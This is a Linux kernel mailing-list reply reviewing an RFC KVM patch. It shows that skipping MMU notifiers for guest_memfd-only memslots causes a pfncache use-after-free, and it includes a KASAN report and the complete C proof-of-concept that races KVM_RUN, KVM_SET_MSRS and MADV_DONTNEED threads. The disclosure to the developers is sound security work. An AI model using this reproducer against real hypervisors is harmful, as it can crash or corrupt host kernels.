Re: [RFC PATCH] KVM: Ignore MMU notifiers for guest_memfd-only memslots

From: XIAO WU

Date: Sat Jun 20 2026 - 20:03:13 EST


Hi

I came across the Sashiko review in this thread and wanted to see if
the pfncache UAF could be triggered in practice.  The short answer is:
yes, it reproduces reliably with a multi-threaded PoC.  Below is the
KASAN report and a brief description of the reproducer.

On Mon, Jun 15, 2026 at 04:52:44PM +0100, Alexandru Elisei wrote:
> For guest_memfd-only memslots (kvm_memslot_is_gmem_only() is true), the
> memory provider for the virtual machine is the guest_memfd file, not the
> userspace mapping.
...
> @@ -592,6 +592,10 @@ static __always_inline kvm_mn_ret_t kvm_handle_hva_range(struct kvm *kvm,
>              unsigned long hva_start, hva_end;
>
>              slot = container_of(node, struct kvm_memory_slot, hva_node[slots->node_idx]);
> +
> +            if (kvm_slot_has_gmem(slot) && kvm_memslot_is_gmem_only(slot))
> +                continue;
> +

This `continue` is the problem.  When the only memslot covering the
HVA range is gmem-only, found_memslot stays false, and in
invalidate_range_end, kvm_mmu_invalidate_end() is never called.
That means mmu_invalidate_seq never increments.

Meanwhile, the pfncache (used for guest pvclock) runs this retry
protocol in hva_to_pfn_retry():

    1. Capture mmu_seq
    2. Drop gpc->lock
    3. GUP + kmap (gets a page reference, creates kernel mapping)
    4. kvm_release_page_clean(page) — drops the reference
    5. Re-acquire gpc->lock
    6. mmu_notifier_retry_cache() — checks if mmu_seq changed

If step 6 sees the same seq, the stale kmap is kept even though the
page was freed after step 4.  This is the UAF.

[Reproduction]

I rebuilt the kernel with CONFIG_KASAN=y and ran the PoC in a QEMU VM.
The trigger is three threads racing concurrently:

  - Thread 1 (T0): hammers KVM_RUN ioctls, forcing
    kvm_guest_time_update → kvm_gpc_refresh → hva_to_pfn_retry
  - Thread 2 (T1): cycles KVM_SET_MSRS to activate/deactivate the
    pvclock pfncache, extending the race window
  - Thread 3 (T2): hammers MADV_DONTNEED + write on the HVA, firing
    MMU notifier invalidations while the memslot is gmem-only

The full PoC source (poc.c) is attached at the end of this mail.
Compiled with: gcc -o poc poc.c -static -lpthread

[KASAN report — kernel 7.1.0-g0eb81d7f81ae #1, CONFIG_KASAN=y]

  ==================================================================
  BUG: KASAN: use-after-free in kvm_setup_guest_pvclock+0x632/0x680
  Read of size 4 at addr ffff888116069000 by task poc/9520

  CPU: 1 UID: 0 PID: 9520 Comm: poc Not tainted 7.1.0-g0eb81d7f81ae #1

  Call Trace:
   <TASK>
   dump_stack_lvl+0x116/0x1f0
   print_report+0xf4/0x600
   kasan_report+0xe0/0x110
   kvm_setup_guest_pvclock+0x632/0x680
   kvm_guest_time_update+0x741/0x1090
   vcpu_run+0x1c2a/0x5a80
   kvm_arch_vcpu_ioctl_run+0x1029/0x18d0
   kvm_vcpu_ioctl+0x772/0x1710
   __x64_sys_ioctl+0x193/0x210           ← KVM_RUN
   do_syscall_64+0x129/0x880
   entry_SYSCALL_64_after_hwframe+0x77/0x7f

  The buggy address belongs to the physical page:
  page: refcount:0 mapcount:0 mapping:0000000000000000 index:0x7ff24ab46

  page last allocated via:
   get_user_pages_unlocked → hva_to_pfn → __kvm_gpc_refresh
     → kvm_gpc_refresh → kvm_setup_guest_pvclock

  page last free pid 9520 tgid 9517 stack trace:
   kvm_release_page_clean → __folio_put → __free_frozen_pages
     ← __kvm_gpc_refresh ← kvm_gpc_refresh

The allocation and free traces confirm the exact scenario from the
review: the page is allocated by GUP during gpc refresh, then freed by
kvm_release_page_clean() inside the same __kvm_gpc_refresh() call,
and then kvm_setup_guest_pvclock still accesses it through the stale
kmap.

The crash reproduces within ~40 seconds of the PoC running.

[Full PoC source]

Compile: gcc -o poc poc.c -static -lpthread

// SPDX-License-Identifier: GPL-2.0-only
/*
 * PoC for: KVM MMU notifier skip regression for guest_memfd-only memslots
 *
 * Concurrent threads create a race between gpc refresh (GUP → kmap →
 * kvm_release_page_clean → retry check) and MMU invalidation (munmap /
 * MADV_DONTNEED) on a gmem-only memslot where the invalidation doesn't
 * increment mmu_invalidate_seq.
 */
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <errno.h>
#include <signal.h>
#include <stdint.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <pthread.h>
#include <linux/kvm.h>

#ifndef KVM_CAP_GUEST_MEMFD
#define KVM_CAP_GUEST_MEMFD 234
#endif
#ifndef GUEST_MEMFD_FLAG_MMAP
#define GUEST_MEMFD_FLAG_MMAP (1ULL << 0)
#endif
#ifndef MSR_KVM_SYSTEM_TIME_NEW
#define MSR_KVM_SYSTEM_TIME_NEW 0x4b564d01
#endif

#define PAGE_SIZE 4096

static volatile bool stop = false;
static int vcpu_fd = -1;
static unsigned long shared_hva = 0;

static void sigint_handler(int sig) { stop = true; }

static void *worker_thread(void *arg)
{
    int tid = (int)(long)arg;
    for (int i = 0; !stop && i < 200000; i++) {
        if (tid == 0)
            ioctl(vcpu_fd, KVM_RUN, 0);
        else if (tid == 1) {
            struct kvm_msrs *msrs = malloc(sizeof(*msrs) + sizeof(msrs->entries[0]));
            if (msrs) {
                memset(msrs, 0, sizeof(*msrs) + sizeof(msrs->entries[0]));
                msrs->nmsrs = 1;
                msrs->entries[0].index = MSR_KVM_SYSTEM_TIME_NEW;
                msrs->entries[0].data = (i & 1) ? 0x1001 : 0x1000;
                ioctl(vcpu_fd, KVM_SET_MSRS, msrs);
                free(msrs);
            }
        } else {
            madvise((void*)shared_hva, PAGE_SIZE, MADV_DONTNEED);
            *(volatile char*)shared_hva = 0x42;
        }
        if (i % 50000 == 0)
            printf("[T%d] %d iterations\n", tid, i);
    }
    printf("[T%d] Done\n", tid);
    return NULL;
}

int main(void)
{
    signal(SIGINT, sigint_handler);
    signal(SIGTERM, sigint_handler);

    int kvm_fd = open("/dev/kvm", O_RDWR);
    int vm_fd = ioctl(kvm_fd, KVM_CREATE_VM, 0);

    struct kvm_create_guest_memfd gmem_cmd = { .size = PAGE_SIZE, .flags = GUEST_MEMFD_FLAG_MMAP };
    int gmem_fd = ioctl(vm_fd, KVM_CREATE_GUEST_MEMFD, &gmem_cmd);

    void *anon = mmap(NULL, PAGE_SIZE, PROT_READ|PROT_WRITE,
                      MAP_PRIVATE|MAP_ANONYMOUS|MAP_POPULATE, -1, 0);
    memset(anon, 0xAA, PAGE_SIZE);
    shared_hva = (unsigned long)anon;

    struct kvm_userspace_memory_region2 mem = {
        .slot = 0, .flags = KVM_MEM_GUEST_MEMFD,
        .guest_phys_addr = 0x1000, .memory_size = PAGE_SIZE,
        .userspace_addr = shared_hva,
        .guest_memfd_offset = 0, .guest_memfd = gmem_fd,
    };
    ioctl(vm_fd, KVM_SET_USER_MEMORY_REGION2, &mem);

    vcpu_fd = ioctl(vm_fd, KVM_CREATE_VCPU, 0);
    size_t mmap_size = ioctl(kvm_fd, KVM_GET_VCPU_MMAP_SIZE, 0);
    struct kvm_run *vcpu_run = mmap(NULL, mmap_size, PROT_READ|PROT_WRITE,
                                    MAP_SHARED, vcpu_fd, 0);

    /* Pre-activate pfncache via MSR */
    struct kvm_msrs *msrs = malloc(sizeof(*msrs) + sizeof(msrs->entries[0]));
    memset(msrs, 0, sizeof(*msrs) + sizeof(msrs->entries[0]));
    msrs->nmsrs = 1;
    msrs->entries[0].index = MSR_KVM_SYSTEM_TIME_NEW;
    msrs->entries[0].data = 0x1001;
    ioctl(vcpu_fd, KVM_SET_MSRS, msrs);
    free(msrs);

    pthread_t threads[3];
    for (int i = 0; i < 3; i++)
        pthread_create(&threads[i], NULL, worker_thread, (void *)(long)i);

    sleep(40);
    stop = true;
    for (int i = 0; i < 3; i++)
        pthread_join(threads[i], NULL);

    printf("[*] Done. Check dmesg for KASAN UAF.\n");
    return 0;
}

Thanks,
XIAOWU